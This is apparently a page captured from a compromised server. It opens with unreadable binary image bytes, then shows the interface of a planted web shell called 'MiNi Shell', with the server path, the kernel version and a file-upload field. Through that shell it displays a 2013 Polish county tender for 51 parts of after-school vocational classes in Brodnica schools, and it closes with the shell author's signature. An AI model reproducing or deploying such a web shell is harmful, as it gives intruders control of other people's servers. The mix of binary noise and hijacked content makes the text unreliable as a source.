JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130115/8741-N-2013.html

<p class="kh_header"><b>Brodnica: Świadczenie usług edukacyjnych polegających na prowadzeniu zajęć pozalekcyjnych w ramach projektu nr WND-POKL.09.02.00-04-035/12 (Centrum Sukcesu Zawodowego)</b><br>
<b>Numer ogłoszenia: 8741 - 2013; data zamieszczenia: 15.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Brodnicki , ul. Kamionka 18, 87-300 Brodnica, woj. kujawsko-pomorskie, tel. 56 4950800, faks 56 4950801.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brodnica.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług edukacyjnych polegających na prowadzeniu zajęć pozalekcyjnych w ramach projektu nr WND-POKL.09.02.00-04-035/12 (Centrum Sukcesu Zawodowego).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest prowadzenie zajęć pozalekcyjnych w następujących zespołach szkół:
1)	Zespole Szkół Rolniczych w Brodnicy, ul. Karbowska 29, 87-300 Brodnica;
2)	Zespole Szkół w Jabłonowie Pomorskim, ul. Nowy Rynek 5, 87-330 Jabłonowo Pomorskie;
3)	Zespół Szkół Zawodowych w Brodnicy, ul. Mazurska 28, 87-300 Brodnica;

2.	Projekt współfinansowany jest ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.

3.	Zamawiający dopuszcza składanie ofert częściowych, zgodnie z następującym podziałem:

1)	Część 1 pn. Prowadzenie zajęć pozalekcyjnych (Barista) w Zespole Szkół Rolniczych w Brodnicy; liczba godzin - 40;

2)	Część 2 pn. Prowadzenie zajęć pozalekcyjnych (Savoir vivre) w Zespole Szkół Rolniczych w Brodnicy; liczba godzin - 15;

3)	Część 3 pn. Prowadzenie zajęć pozalekcyjnych (Savoir vivre) w Zespole Szkół Rolniczych w Brodnicy; liczba godzin - 15;

4)	Część 4 pn. Prowadzenie zajęć pozalekcyjnych (Poznaj swój region) w Zespole Szkół Rolniczych w Brodnicy; liczba godzin - 160; 

5)	Część 5 pn. Prowadzenie zajęć pozalekcyjnych przygotowujących do egzaminów zawodowych - technik hotelarstwa w Zespole Szkół Rolniczych w Brodnicy ; liczba godzin - 40;

6)	Część 6 pn. Prowadzenie zajęć pozalekcyjnych przygotowujących do egzaminów zawodowych - kucharz małej gastronomii w Zespole Szkół Rolniczych w Brodnicy ; liczba godzin - 40;

7)	Część 7 pn. Prowadzenie zajęć pozalekcyjnych (Dekoracje cukiernicze) w Zespole Szkół Rolniczych w Brodnicy; liczba godzin - 20;

8)	Część 8 pn. Prowadzenie zajęć pozalekcyjnych (Barman) w Zespole Szkół Rolniczych w Brodnicy; liczba godzin - 30;

9)	Część 9 pn. Prowadzenie zajęć pozalekcyjnych (Obsługa gości indywidualnych i imprez okolicznościowych) w Zespole Szkół Rolniczych w Brodnicy; liczba godzin - 20;

10)	Część 10 pn. Prowadzenie zajęć pozalekcyjnych (Kelner) w Zespole Szkół Rolniczych w Brodnicy; liczba godzin - 20;

11)	Część 11 pn. Prowadzenie zajęć pozalekcyjnych (Kelner) w Zespole Szkół Rolniczych w Brodnicy; liczba godzin - 20;


12)	Część 12 pn. Prowadzenie zajęć pozalekcyjnych (Carving) w Zespole Szkół Rolniczych w Brodnicy; liczba godzin - 20;

13)	Część 13 pn. Prowadzenie zajęć pozalekcyjnych (Kujawsko - Pomorskie sekrety smaku); liczba godzin - 20;

14)	Część 14 pn. Prowadzenie zajęć pozalekcyjnych (Florystyka i bukieciarstwo) w Zespole Szkół Rolniczych w Brodnicy; liczba godzin - 40;

15)	Część 15 pn. Prowadzenie zajęć pozalekcyjnych (Przedsiębiorczość od A do Z i wsparcie psychologiczne) ukierunkowanych na podniesienie umiejętności kluczowych w zakresie przedsiębiorczości i ekonomiki dla uczniów szkół ponadgimnazjalnych w Zespole Szkół Rolniczych w Brodnicy; liczba godzin - 100;

16)	Część 16 pn. Prowadzenie zajęć pozalekcyjnych (Przedsiębiorczość od A do Z i wsparcie psychologiczne) ukierunkowanych na podniesienie umiejętności kluczowych w zakresie przedsiębiorczości i ekonomiki dla uczniów szkół ponadgimnazjalnych w Zespole Szkół Rolniczych w Brodnicy; liczba godzin - 100;

17)	Część 17 pn. Prowadzenie zajęć pozalekcyjnych (Przedsiębiorczość od A do Z i wsparcie psychologiczne) ukierunkowanych na podniesienie umiejętności kluczowych - wsparcie psychologiczne dla uczniów szkół ponadgimnazjalnych w Zespole Szkół Rolniczych 
w Brodnicy; liczba godzin - 40;

18)	Część 18 pn. Prowadzenie zajęć pozalekcyjnych z języka niemieckiego w hotelarstwie 
w zakresie słownictwa technicznego dla uczniów szkół ponadgimnazjalnych w Zespole Szkół Rolniczych w Brodnicy; liczba godzin - 40;

19)	Część 19 pn. Prowadzenie zajęć pozalekcyjnych z matematyki dla klas technikum hotelarskiego w Zespole Szkół Rolniczych w Brodnicy; liczba godzin - 60;

20)	Część 20 pn. Prowadzenie zajęć pozalekcyjnych z matematyki dla klas technikum gastronomicznego w Zespole Szkół Rolniczych w Brodnicy; liczba godzin - 60;

21)	 Część 21 pn. Praktyki zawodowe w branży hotelarskiej uczniów technikum hotelarskiego w Zespole Szkół Rolniczych w Brodnicy - kierownik szkolenia praktycznego; liczba godzin - 20; 

22)	Część 22 pn. Praktyki zawodowe w branży gastronomicznej uczniów technikum gastronomicznego w Zespole Szkół Rolniczych w Brodnicy - kierownik szkolenia praktycznego; liczba godzin - 20; 
23)	 Część 23 pn. Staże zawodowe w branży gastronomicznej uczniów technikum gastronomicznego  w Zespole Szkół Rolniczych w Brodnicy - opiekun stażu; liczba godzin - 40;

24)	 Część 24 pn. Staże zawodowe w branży hotelarskiej uczniów technikum hotelarskiego  w Zespole Szkół Rolniczych w Brodnicy - opiekun stażu; liczba godzin - 40;

25)	Część 25 pn. Prowadzenie zajęć pozalekcyjnych z języka angielskiego w Zespole Szkół w Jabłonowie Pomorskim; liczba godzin - 75;

26)	Część 26 pn. Prowadzenie zajęć pozalekcyjnych z języka angielskiego w Zespole Szkół w Jabłonowie Pomorskim; liczba godzin - 75;

27)	Część 27 pn. Prowadzenie zajęć pozalekcyjnych z matematyki w Zespole Szkół w Jabłonowie Pomorskim; liczba godzin - 75;

28)	Część 28 pn. Prowadzenie zajęć pozalekcyjnych z matematyki w Zespole Szkół w Jabłonowie Pomorskim; liczba godzin - 75;

29)	Część 29 pn. Prowadzenie zajęć pozalekcyjnych ukierunkowanych na doskonalenie umiejętności zawodowych uczniów technikum ekonomicznego w Zespole Szkół w Jabłonowie Pomorskim; liczba godzin - 60; 

30)	Część 30 pn. Prowadzenie zajęć pozalekcyjnych ukierunkowanych na doskonalenie umiejętności zawodowych uczniów technikum ekonomicznego w Zespole Szkół w Jabłonowie Pomorskim; liczba godzin -  30;

31)	Część 31 pn. Prowadzenie zajęć pozalekcyjnych ukierunkowanych na doskonalenie umiejętności zawodowych uczniów technikum agrobiznesu w Zespole Szkół w Jabłonowie Pomorskim; liczba godzin - 60; 

32)	Część 32 pn. Prowadzenie zajęć pozalekcyjnych ukierunkowanych na doskonalenie umiejętności zawodowych uczniów technikum agrobiznesu w Zespole Szkół w Jabłonowie Pomorskim; liczba godzin - 30; 

33)	Część 33 pn. Prowadzenie zajęć pozalekcyjnych ukierunkowane na rozwijanie kompetencji kluczowych (Nauka języka HTML i kurs CMS) - koło informatyczne w Zespole Szkół w Jabłonowie Pomorskim; liczba godzin - 64;

34)	Część 34 pn. Prowadzenie zajęć pozalekcyjnych ukierunkowane na rozwijanie kompetencji kluczowych (Koło astronomiczno - fizyczne) w Zespole Szkół w Jabłonowie Pomorskim; liczba godzin - 40;

35)	Część 35 pn. Prowadzenie zajęć pozalekcyjnych ukierunkowane na rozwijanie kompetencji kluczowych (Profesjonalna obsługa klienta) w Zespole Szkół w Jabłonowie Pomorskim; liczba godzin - 28;

36)	Część 36 pn. Prowadzenie zajęć pozalekcyjnych sportowo - obronnych w Zespole Szkół w Jabłonowie Pomorskim; liczba godzin - 150;

37)	Część 37 pn. Prowadzenie zajęć pozalekcyjnych sportowo - obronnych w Zespole Szkół w Jabłonowie Pomorskim; liczba godzin - 9;

38)	Część 38 pn. Prowadzenie zajęć pozalekcyjnych z zakresu doradztwa zawodowego w Zespole Szkół w Jabłonowie Pomorskim; liczba godzin - 30;

39)	Część 39 pn. Prowadzenie zajęć pozalekcyjnych z zakresu doradztwa zawodowego w Zespole Szkół w Jabłonowie Pomorskim; liczba godzin - 30;

40)	Część 40 pn. Prowadzenie zajęć pozalekcyjnych z zakresu przemysłu rolno - spożywczego  ukierunkowanych na przygotowanie uczniów z Zespołu Szkół w Jabłonowie Pomorskim do stażu zawodowego - warsztaty ; liczba godzin - 14;

41)	 Część 41 pn. Staże zawodowe w branży przemysłu rolno-spożywczego - opiekun stażu; liczba godzin - 20;

42)	Część 42 pn. Prowadzenie zajęć pozalekcyjnych z zakresu biobudownictwa ukierunkowanych na przygotowanie uczniów Zespołu Szkół Zawodowych w Brodnicy do praktyk zawodowych; liczba godzin - 12;

43)	 Część 43 pn. Praktyki zawodowe w branży budowlanej uczniów Technikum budowlanego w Zespole Szkół Zawodowych w Brodnicy - kierownik szkolenia praktycznego; liczba godzin: 40;

44)	Część 44 pn. Prowadzenie zajęć pozalekcyjnych z zakresu grafiki komputerowej w Zespole Szkół Zawodowych w Brodnicy; liczba godzin - 80; 

45)	Część 45 pn. Prowadzenie zajęć pozalekcyjnych z zakresu teorii i metodyki konserwacji XIX i XX w. budynków ceglanych w procesach adaptacyjnych i budowlanych ukierunkowanych na przygotowanie uczniów z Zespołu Szkół Zawodowych w Brodnicy do stażu zawodowego;  liczba godzin - 6;

46)	 Część 46 pn. Staże zawodowe w branży budowlanej uczniów Technikum budowlanego w Zespole szkół Zawodowych w Brodnicy - opiekun stażu; liczba godzin - 20;

47)	Część 47 pn. Prowadzenie zajęć pozalekcyjnych z zakresu doradztwa zawodowego (Kreator sukcesu) w Zespole Szkół Zawodowych w Brodnicy; liczba godzin - 108;

48)	Część 48 pn. Prowadzenie zajęć pozalekcyjnych z zakresu doradztwa zawodowego (Kreator sukcesu) w Zespole Szkół Zawodowych w Brodnicy; liczba godzin - 108;

49)	Część 49 pn.  Prowadzenie zajęć pozalekcyjnych z zakresu języka angielskiego w ramach zadania (Kreator sukcesu) w Zespole Szkół Zawodowych w Brodnicy; liczba godzin - 24;

50)	Część 50 pn. Prowadzenie zajęć pozalekcyjnych z zakresu pomocy psychologicznej (Młodzi ponad podziałami) - warsztaty przeciwdziałające zachowaniom ryzykownym w Zespole Szkół Zawodowych w Brodnicy; liczba godzin - 18;

51)	Część 51 pn. Prowadzenie zajęć pozalekcyjnych z zakresu pomocy psychologicznej (Młodzi ponad podziałami) - warsztaty przeciwdziałające zachowaniom ryzykownym w Zespole Szkół Zawodowych w Brodnicy; liczba godzin - 18;


Przeprowadzenie zajęć wymienionych w powyższych częściach ma na celu m.in.: podniesienie kwalifikacji i umiejętności zawodowych, rozwój umiejętności przetwarzania zdobytych wiadomości i doświadczeń, krytycznego myślenia, dostrzegania związków przyczynowo-skutkowych, wnioskowania, argumentowania, wypowiadania się w mowie i piśmie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 51.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek,  Zamawiający wymaga, aby Wykonawca złożył Oświadczenie Zał. Nr 2 o spełnieniu warunków udziału w postępowaniu;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek,  Zamawiający wymaga, aby Wykonawca złożył Oświadczenie Zał. Nr 2 o spełnieniu warunków udziału w postępowaniu;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek,  Zamawiający wymaga, aby Wykonawca złożył Oświadczenie Zał. Nr 2 o spełnieniu warunków udziału w postępowaniu;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek, o którym mowa w pkt 4, Zamawiający wymaga, aby Wykonawca wykazał, że osoba, która będzie wykonywać zadanie spełnia wymagania, o których mowa w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009 r. Nr 50 poz. 400). Zał. Nr 8.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek,  Zamawiający wymaga, aby Wykonawca złożył Oświadczenie Zał. Nr 2 o spełnieniu warunków udziału w postępowaniu;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>opis zajęć dotyczący części, na którą zostanie złożona oferta tj. ogólny program zajęć.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w przypadkach:
1)Zmiany podwykonawcy oraz zmiana zakresu usług powierzonych podwykonawcy.   Zamawiający może dopuścić zmianę zakresu zamówienia powierzonego podwykonawcom w trakcie realizacji zamówienia na wniosek Wykonawcy, jeżeli konieczność takiej zmiany jest spowodowana okolicznościami, na które Wykonawca nie miał wpływu. Zmiana podwykonawcy wymaga uprzedniej zgody Zamawiającego. Zgoda ta może być udzielona, jeżeli konieczność takiej zmiany jest spowodowana okolicznościami, na które Wykonawca nie miał wpływu, w szczególności śmierć lub likwidacja dotychczasowego podwykonawcy, utrata przez dotychczasowego podwykonawcę możliwości prawidłowego i terminowego zrealizowania powierzonej mu części zamówienia.
2)Zmiany terminów realizacji zamówienia zgodnie ze zmianami w umowie    o dofinansowanie, w szczególności w przypadku zmiany harmonogramu terminowego realizacji przedmiotowego projektu,
         3)zmiany terminów określonych w załącznikach 7a, 7b, 7c do SIWZ.
         4)zmiany danych teleadresowych.
     6. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną  na piśmie               w postaci kolejnych aneksów, pod rygorem nieważności takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.brodnica.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Brodnicy, ul. kamionka 18, 87-300 Brodnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.01.2013 godzina 10:00, miejsce: Starostwo Powiatowe w Brodnicy, ul. kamionka 18, 87-300 Brodnica.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt CENTRUM SUKCESU ZAWODOWEGO współfinansowany jest ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny kapitał Ludzki na lata 2007-20013, Priorytet IX  Rozwój wykształcenia i kompetencji w regionach Działanie 9.2  - Podniesienie atrakcyjności i jakości szkolnictwa zawodowego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com